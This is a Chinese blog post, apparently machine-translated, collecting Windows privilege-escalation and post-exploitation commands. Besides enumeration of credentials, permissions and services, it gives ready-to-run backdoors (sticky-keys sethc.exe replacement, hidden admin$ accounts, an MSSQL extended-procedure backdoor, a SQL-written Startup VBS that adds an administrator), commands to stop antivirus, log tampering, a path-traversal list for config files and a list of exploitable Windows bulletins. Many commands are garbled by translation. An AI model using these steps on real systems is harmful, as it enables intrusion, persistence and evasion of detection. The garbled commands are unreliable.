提权思路


介绍

窗户提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西。最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西。希望本指南能为你的入门提供良好的基础知识。

 

所以本指南主要集中在枚举方面。

注:我不是专家,仍然在学习当中。

 

指南概述

在每个部分中,我首先提供老的可靠的CMD命令,然后是一个PowerShell的实现的的等价命令。同时拥有这两种工具是非常好的,Powershell的比传统的CMD更加灵活。然而,没有一个的powershell命令能等价于所有东西(或者CMD在某些事情上仍然更简单更好),所以一些部分将只包含常规的CMD命令。

 


命令了解操作系统类型和架构?它是否缺少任何补丁?

系统信息

wmic qfe

 

 

环境变量有什么有趣的地方吗?域控制器在LOGONSERVER?

Get-ChildItem环境:| ft Key,Value

 

有没有其他连接的驱动器?

净使用

wmic logicaldisk获取标题,描述,providername

Get-PSDrive | 其中{$ _。Provider -like“Microsoft.PowerShell.Core \ FileSystem”} | ft Name,Root

 

用户,你是谁?

我是谁

echo%USERNAME%

$ ENV:用户名

 

系统上有哪些用户?任何旧的用户配置文件没有被清理掉?

净用户

dir / b / ad“C:\ Users \”

dir / b / ad“C:\ Documents and Settings \”#Windows XP及以下版本

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\ Users -Force | 选择名称

 

是否有其他人登录?

qwinsta

 

系统上有哪些用户组?

净本地组

Get-LocalGroup | ft名称

 

 

在管理员组中有哪些用户?

net localgroup管理员

Get-LocalGroupMember管理员| ft Name,PrincipalSource

 

用户自动登录对应的注册表中有些什么内容?

reg查询“HKLM \ SOFTWARE \ Microsoft \ Windows NT \ Currentversion \ Winlogon”2> nul | findstr“DefaultUserName DefaultDomainName DefaultPassword”

Get-ItemProperty -Path'Registry :: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ WinLogon'| 选择“默认*”

 

凭证经理中有什么有趣的东西?

cmdkey / list

 

我们可以访问SAM和SYSTEM文件吗?

%SYSTEMROOT%\维修\ SAM

%SYSTEMROOT%\ system32 \设置\ Regback文件\ SAM

%SYSTEMROOT%\ system32 \设置\ SAM

%SYSTEMROOT%\修复\系统

%SYSTEMROOT%\ system32 \设置\ SYSTEM

%SYSTEMROOT%\ system32 \设置\ Regback文件\系统

 

 

 

程序,进程和服务,系统都安装了些什么软件?

dir / a“C:\ Program Files”

dir / a“C:\ Program Files(x86)”

reg查询HKEY_LOCAL_MACHINE \ SOFTWARE

Get-ChildItem'C:\ Program Files','C:\ Program Files(x86)'| ft Parent,Name,LastWriteTime

Get-ChildItem -path Registry :: HKEY_LOCAL_MACHINE \ SOFTWARE | ft名称

 

 

有没有权限设置的比较脆弱的文件夹或文件的权限?

在程序文件夹中(Program Folders)有哪些文件或文件夹赋予了所有人(Everyone)或用户(User)的完全权限?

icacls“C:\ Program Files \ *”2> nul | findstr“(F)”| findstr“Everyone”

icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(F)”| findstr“Everyone”

icacls“C:\ Program Files \ *”2> nul | findstr“(F)”| findstr“BUILTIN \ Users”

icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(F)”| findstr“BUILTIN \ Users”

 

 

修改程序文件夹(Program Folders)中的所有人(Everyone)或用户(User)的权限?

icacls“C:\ Program Files \ *”2> nul | findstr“(M)”| findstr“Everyone”

icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(M)”| findstr“Everyone”

icacls“C:\ Program Files \ *”2> nul | findstr“(M)”| findstr“BUILTIN \ Users”

icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(M)”| findstr“BUILTIN \ Users”

Get-ChildItem'C:\ Program Files \ *','C:\ Program Files(x86)\ *'| %{try {Get-Acl $ _ -EA SilentlyContinue | 其中{($ _.Access | select -ExpandProperty IdentityReference)-match'Everyone'}} catch {}}

Get-ChildItem'C:\ Program Files \ *','C:\ Program Files(x86)\ *'| %{try {Get-Acl $ _ -EA SilentlyContinue | 其中{($ _.Access | select -ExpandProperty IdentityReference)-match'BUILTIN \ Users'}} catch {}}

 

 

你也可以上传的Sysinternals中的的AccessChk来检查可写文件夹和文件。

accesschk.exe -qwsu“Everyone”*

accesschk.exe -qwsu“Authenticated Users”*

accesschk.exe -qwsu“用户”*

 

系统上正在运行的进程/服务有哪些?有没有暴露的内部服务?如果是这样,我们可以打开它吗?请参阅附录中的端口转发。

任务列表/ svc

任务清单/ v

净开始

sc查询

Get-Process | ft ProcessName,Id

GET-服务

 

是否存在任何脆弱的服务权限?我们可以重新配置什么吗?你可以再次上传的AccessChk来检查权限。

accesschk.exe -uwcqv“Everyone”*

accesschk.exe -uwcqv“Authenticated Users”*

accesschk.exe -uwcqv“用户”*

 

有没有引用的服务路径?

wmic service get name,displayname,pathname,startmode 2> nul | findstr / i“Auto”2> nul | findstr / i / v“C:\ Windows \\”2> nul | findstr / i / v“”“

 

是否设置了计划任务?任何自定义实现的计划任务?

schtasks / query / fo列表2> nul | findstr TaskName

dir C:\ windows \ tasks

Get-ScheduledTask | ft TaskName,State

 

系统启动时都运行了些什么?

wmic startup get caption,command

reg query HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run

reg query HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce

reg查询HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run

reg查询HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce

目录“C:\ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup”

目录“C:\ Documents and Settings \%username%\ Start Menu \ Programs \ Startup”

 

Get-CimInstance Win32_StartupCommand | 选择名称,命令,位置,用户| FL

Get-ItemProperty -Path'Registry :: HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run'

Get-ItemProperty -Path'Registry :: HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce'

Get-ItemProperty -Path'Registry :: HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run'

Get-ItemProperty -Path'Registry :: HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce'

Get-ChildItem“C:\ Users \ All Users \ Start Menu \ Programs \ Startup”

Get-ChildItem“C:\ Users \ $ env:USERNAME \ Start Menu \ Programs \ Startup”

 

AlwaysInstallElevated是否启用?我没有跑过这个,但没有伤害检查。

reg query HKCU \ SOFTWARE \ Policies \ Microsoft \ Windows \ Installer / v AlwaysInstallElevated

 

网络连接到了哪一块网卡?是否有多个网络?

ipconfig / all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

 

我们有哪些网络路线?

路线打印

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

 

ARP缓存中有什么?

arp -a

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

 

是否有连接到其他主机的网络连接?

netstat -ano

 

主机文件中的有什么东西?

C:\ WINDOWS \ SYSTEM32 \ DRIVERS \ ETC \主机

 

防火墙是否打开?如果是又是怎样配置的?

netsh防火墙显示状态

netsh防火墙显示配置

netsh advfirewall防火墙显示规则名称=全部

netsh advfirewall export“firewall.txt”

 

任何其他有趣的接口配置?

netsh转储

 

有没有SNMP配置?

reg查询HKLM \ SYSTEM \ CurrentControlSet \ Services \ SNMP / s

Get-ChildItem -path HKLM:\ SYSTEM \ CurrentControlSet \ Services \ SNMP -Recurse

 

有趣的文件和敏感信息

 

这部分内容的命令输出可能有点杂乱,所以你可能想把命令的输出重定向到TXT文件中进行审查和解析。

 

在注册表中是否有任何密码?

reg查询HKCU / f密码/ t REG_SZ / s

reg查询HKLM / f密码/ t REG_SZ / s

 

查看是否存在没有清理掉的系统预备或无人值守的文件?

dir / s * sysprep.inf * sysprep.xml * unattended.xml * unattend.xml * unattend.txt 2> nul

Get-Childitem -Path C:\ -Include * unattend *,* sysprep * -File -Recurse -ErrorAction SilentlyContinue | 其中{($ _。Name -like“* .xml”-or $ _。Name -like“* .txt”-or $ _。Name -like“* .ini”)}

 

如果服务器是IIS网络服务器,那么的Inetpub中有什么?以及任何隐藏的目录?的web.config文件?

dir / a C:\ inetpub \

dir / s web.config

C:\ WINDOWS \ SYSTEM32 \ INETSRV \设置\的applicationHost.config

Get-Childitem -Path C:\ inetpub \ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

 

在IIS日志目录中有些什么文件?

C:\的Inetpub \日志\ LogFiles文件\ W3SVC1 \ u_ex [YYMMDD]的.log

C:\的Inetpub \日志\ LogFiles文件\ W3SVC2 \ u_ex [YYMMDD]的.log

C:\的Inetpub \日志\ LogFiles文件\ FTPSVC1 \ u_ex [YYMMDD]的.log

C:\的Inetpub \日志\ LogFiles文件\ FTPSVC2 \ u_ex [YYMMDD]的.log

 

是否安装了XAMPP,阿帕奇或PHP?任何有XAMPP,阿帕奇或PHP配置文件?

dir / s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue

 

系统中是否存在任何的Apache网络日志?

dir / s access.log error.log

Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

 

系统中是否任何有趣的文件?可能在用户目录(桌面,文档等)?

dir / s * pass * == * vnc * == * .config * 2> nulGet-Childitem -Path C:\ Users \ -Include * password *,* vnc *,*。config -File -Recurse -ErrorAction SilentlyContinue

 

系统中是否有包含密码的文件?

findstr / si密码* .xml * .ini * .txt * .config 2> nul

Get-ChildItem C:\ * -include * .xml,*。ini,* .txt,*。config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern“密码”

cmd下操作VPN相关知识,资料:

#允许管理员拨入该VPN:

netsh ras设置用户管理员许可

 

#禁止管理员拨入该VPN:

netsh ras设置用户管理员拒绝

 

#查看哪些用户可以拨入VPN:

netsh ras show user

 

#查看VPN分配IP的方式:

netsh ras ip show config

 

#使用地址池的方式分配IP:

netsh ras ip set addrassign method = pool

#地址池的范围是从192.168.3.1到192.168.3.254:

netsh ras ip add from = 192.168.3.1 to = 192.168.3.254

 

Cmd,Dos命令行下添加SQL用户的方法:

 

需要有管理员权限,在命令下先建立一个“C:\ test.qry”文件,内容如下:

exec master.dbo.sp_addlogin test,123

EXEC sp_addsrvrolemember'test,'sysadmin'

然后在DOS下执行:cmd.exe / c isql -E / U alma / P /ic:\ test.qry

 

 

另类的加用户方法:

 

在删掉了net.exe和不用adsi之外,新的加用户的方法。代码如下:

 

JS:

var o = new ActiveXObject(“Shell.Users”);

z = o.create(“test”);

z.changePassword( “123456”, “”)

z.setting( “ACCOUNTTYPE”)= 3;

VBS:

查看源

设置o = CreateObject(“Shell.Users”)

设置z = o.create(“test”)

z.changePassword“123456”,“”

z.setting( “ACCOUNTTYPE”)= 3

 

Cmd访问控制权限控制:

 

命令如下:

cacls c:/ e / t / g大家:F #c盘大家权限

cacls“目录”/ d大家#everyone不可读,包括管理员

 

备注:

 

反制方法,在文件夹安全设置里将Everyone设定为不可读,如果没有安全性选项:工具 - 文件夹选项 - 使用简单的共享去掉即可。

 

3389相关,以下配合PR更好:

 

a,防火墙TCP / IP筛选。(关闭:net stop policyagent&net stop sharedaccess)

 

B,内网环境(lcx.exe)

 

c,终端服务器超出了最大允许连接(XP运行:mstsc / admin; 2003运行:mstsc / console)

 

1.查询终端端口:

REG查询HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server \ WinStations \ RDP-Tcp / v PortNumber

 

2.开启XP和2003终端服务:

REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server / v fDenyTSConnections / t REG_DWORD / d 00000000 / f

 

3.更改终端端口为2008(十六进制为:0x7d8):

REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server \ Wds \ rdpwd \ Tds \ tcp / v PortNumber / t REG_DWORD / d 0x7d8 / f

REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server \ WinStations \ RDP-Tcp / v PortNumber / t REG_DWORD / d 0x7D8 / f

 

4.取消XP和2003系统防火墙对终端服务的限制及IP连接的限制:

REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Services \ SharedAccess \ Parameters \ FirewallPolicy \ StandardProfile \ GloballyOpenPorts \ List / v 3389:TCP / t REG_SZ / d 3389:TCP:*:启用:@ xpsp2res.dll,-22009 / f

创建表a(cmd文本);

插入值(“set wshshell = createobject(”“wscript.shell”“)”);

插入值(“a = wshshell.run(”“cmd.exe / c net user admin admin / add”“,0)”);

插入值(“b = wshshell.run(”“cmd.exe / c net localgroup administrators admin / add”“,0)”);

select * from a into outfile“C:\\ Documents and Settings \\ All Users \\”开始“菜单\\程序\\启动\\ a.vbs”;

 

 

BS马的的PortMap功能,类似LCX做转发若果支持ASPX,用这个转发会隐蔽点(注:一直忽略了在偏僻角落的那个功能)。

 

关闭常见杀软(把杀软所在的文件的所有权限去掉):

 

处理变态诺顿企业版:

 

net stop“Symantec AntiVirus”/ y

net stop“Symantec AntiVirus定义观察器”/ y

net stop“赛门铁克赛事经理”/ y

净停止“系统事件通知”/ y

net stop“Symantec Settings Manager”/ y

 

麦咖啡:

网络停止“McAfee McShield”

 

赛门铁克病毒日志:

C:\ Documents and Settings \ All Users \ Application Data \ Symantec \ Symantec Endpoint Protection \ Logs

 

赛门铁克病毒备份:

C:\ Documents and Settings \ All Users \ Application Data \ Symantec \ Symantec Endpoint Protection \ Quarantine

 

NOD32病毒备份:

C:\ Docume~1 \ Administrator \ Local Settings \ Application Data \ ESET \ ESET NOD32 Antivirus \ Quarantine

 

NOD32移除密码保护:

 

删除“HKEY_LOCAL_MACHINE \ SOFTWARE \ ESET \ ESET Security \ CurrentVersion \ Info \ PackageID”即可

 

安装5次移位后门,沾滞键后门,替换SHIFT后门:

 

5次SHIFT,沾滞键后门:

 

复制%systemroot%\ system32 \ sethc.exe%systemroot%\ system32 \ dllcache \ sethc1.exe

复制%systemroot%\ system32 \ cmd.exe%systemroot%\ system32 \ dllcache \ sethc.exe / y

复制%systemroot%\ system32 \ cmd.exe%systemroot%\ system32 \ sethc.exe / y

 

替换SHIFT后门:

attrib c:\ windows \ system32 \ sethc.exe -h -r -s

attrib c:\ windows \ system32 \ dllcache \ sethc.exe -h -r -s

del c:\ windows \ system32 \ sethc.exe

复制c:\ windows \ explorer.exe c:\ windows \ system32 \ sethc.exe

复制c:\ windows \ system32 \ sethc.exe c:\ windows \ system32 \ dllcache \ sethc.exe

attrib c:\ windows \ system32 \ sethc.exe + h + r + s

attrib c:\ windows \ system32 \ dllcache \ sethc.exe + h + r + s

 

添加隐藏系统账号:

 

如图1所示,执行命令:

“net user admin $ 123456 / add&net localgroup administrators admin $ / add”。

2,导出注册表SAM下用户的两个键值。

 

3,在用户管理界面里的admin $删除,然后把备份的注册表导回去。

 

4,利用黑客后卫把相关用户注册表隐藏。

 

安装MSSQL扩展后门:

使用主人;

EXEC sp_addextendedproc'xp_helpsystem','xp_helpsystem.dll';

GRANT exec在xp_helpsystem上公开;

 

处理服务器MSFTP日志:

 

在“C:\ WINNT \ system32 \ LogFiles \ MSFTPSVC1 \”下有ex011120.log / ex011121.log / ex011124.log三个文件,直接删除ex0111124.log不成功,显示“原文件......正在使用”。

 

当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。

 

当停止“MSFTPSVC”服务后可直接删除“ex011124.log”。

 

MSSQL查询分析器连接记录清除:

 

MSSQL 2000位于注册表如下:

 

HKEY_CURRENT_USER \ Software \ Microsoft \ Microsoft SQL Server \ 80 \ Tools \ Client \ PrefServers

找到接接过的信息删除。

 

MSSQL 2005是在:

 

C:\ Documents and Settings \\ Application Data \ Microsoft \ Microsoft SQL Server \ 90 \ Tools \ Shell \ mru.dat

 

各种网站的配置文件相对路径大全:

/config.php

../../config.php

../config.php

../../../config.php

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/conn.php

./conn.php

../../conn.php

../conn.php

../../../conn.php

/conn.asp

./conn.asp

../../conn.asp

../conn.asp

../../../conn.asp

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/config/config.php

../../config/config.php

../config/config.php

../../../config/config.php

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/config/conn.php

./config/conn.php

../../config/conn.php

../config/conn.php

../../../config/conn.php

/config/conn.asp

./config/conn.asp

../../config/conn.asp

../config/conn.asp

../../../config/conn.asp

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/data/config.php

../../data/config.php

../data/config.php

../../../data/config.php

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/data/conn.php

./data/conn.php

../../data/conn.php

../data/conn.php

../../../data/conn.php

/data/conn.asp

./data/conn.asp

../../data/conn.asp

../data/conn.asp

../../../data/conn.asp

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/include/config.php

../../include/config.php

../include/config.php

../../../include/config.php

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/include/conn.php

./include/conn.php

../../include/conn.php

../include/conn.php

../../../include/conn.php

/include/conn.asp

./include/conn.asp

../../include/conn.asp

../include/conn.asp

../../../include/conn.asp

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/inc/config.php

../../inc/config.php

../inc/config.php

../../../inc/config.php

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/inc/conn.php

./inc/conn.php

../../inc/conn.php

../inc/conn.php

../../../inc/conn.php

/inc/conn.asp

./inc/conn.asp

../../inc/conn.asp

../inc/conn.asp

../../../inc/conn.asp

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

的index.php

./index.php

../../index.php

../index.php

../../../index.php

/index.asp

./index.asp

../../index.asp

../index.asp

../../../index.asp

 

 

大牛总结的窗口提权精通合集

 

漏洞列表

 

#Security Bulletin #KB #Description #Operating System

CVE-2017-0213 [Windows COM特权提升漏洞](Windows 10 / 8.1 / 7/2016 / 2010/2008)

MS17-010 [KB4013389] [Windows内核模式驱动程序](Windows 7/2008/2003 / XP)

MS16-135 [KB3199135] [Windows内核模式驱动程序](2016)

MS16-098 [KB3178466] [内核驱动程序](Win 8.1)

MS16-075 [KB3164038] [Hot Potato](2003/2008/7/8/2012)

MS16-032 [KB3143141] [二次登录处理](2008/7/8/10/2012)

MS16-016 [KB3136041] [WebDAV](2008 / Vista / 7)

MS15-097 [KB3089656] [远程执行代码](win8.1 / 2012)

MS15-076 [KB3067505] [RPC](2003/2008/7/8/2012)

MS15-077 [KB3077657] [ATM](XP / Vista / Win7 / Win8 / 2000/2003/2008 / 2012)

MS15-061 [KB3057839] [内核驱动程序](2003/2008/7/8/2012)

MS15-051 [KB3057191] [Windows内核模式驱动程序](2003/2008/7/8/2012)

MS15-010 [KB3036220] [内核驱动程序](2003/2008/7/8)

MS15-015 [KB3031432] [内核驱动程序](Win7 / 8 / 8.1 / 2012 / RT / 2012 R2 / 2008 R2)

MS15-001 [KB3023266] [内核驱动程序](2008/2012/7/8)

MS14-070 [KB2989935] [内核驱动程序](2003)

MS14-068 [KB3011780] [域名特权升级](2003/2008/2012/7/8)

MS14-058 [KB3000061] [Win32k.sys](2003/2008/2012/7/8)

MS14-040 [KB2975684] [AFD驱动程序](2003/2008/2012/7/8)

MS14-002 [KB2914368] [NDProxy](2003 / XP)

MS13-053 [KB2850851] [win32k.sys](XP / Vista / 2003/2008 / win 7)

MS13-046 [KB2840221] [dxgkrnl.sys](Vista / 2003/2008 / 2012/7)

MS13-005 [KB2778930] [内核模式驱动程序](2003/2008 / 2012 / win7 / 8)

MS12-042 [KB2972621] [服务总线](2008/2012 / win7)

MS12-020 [KB2671387] [RDP](2003/2008/7 / XP)

MS11-080 [KB2592799] [AFD.sys](2003 / XP)

MS11-062 [KB2566454] [NDISTAPI](2003 / XP)

MS11-046 [KB2503665] [AFD.sys](2003/2008/7 / XP)

MS11-011 [KB2393802] [内核驱动程序](2003/2008/7 / XP / Vista)

MS10-092 [KB2305420] [任务计划程序](2008/7)

MS10-065 [KB2267960] [FastCGI](IIS 5.1,6.0,7.0和7.5)

MS10-059 [KB982799] [ACL-Churraskito](2008/7 / Vista)

MS10-048 [KB2160329] [win32k.sys](XP SP2和SP3 / 2003 SP2 / Vista SP1和SP2 / 2008 Gold&SP2&R2 / Win7)

MS10-015 [KB977165] [KiTrap0D](2003/2008/7 / XP)

MS09-050 ??[KB975517] [远程执行代码](2008 / Vista)

MS09-020 [KB970483] [IIS 6.0](IIS 5.1和6.0)

MS09-012 [KB959454] [Chimichurri](Vista / win7 / 2008 / Vista)

MS08-068 [KB957097] [远程执行代码](2000 / XP)

MS08-067 [KB958644] [远程执行代码](Windows 2000 / XP / Server 2003 / Vista / Server 2008)

MS08-025 [KB941693] [Win32.sys](XP / 2003/2008 / Vista)

MS06-040 [KB921883] [远程执行代码](2003 / xp / 2000)

MS05-039 [KB899588] [PnP服务](Win 9X / ME / NT / 2000 / XP / 2003)

MS03-026 [KB823980] [RPC接口中的缓冲区溢出](/ NT / 2000 / XP / 2003)

 

 

项目下载地址; https://github.com/SecWiki/windows-kernel-exploits

posted @ 2019-10-18 14:57  Sumarua  阅读(291)  评论(0编辑  收藏  举报
Live2D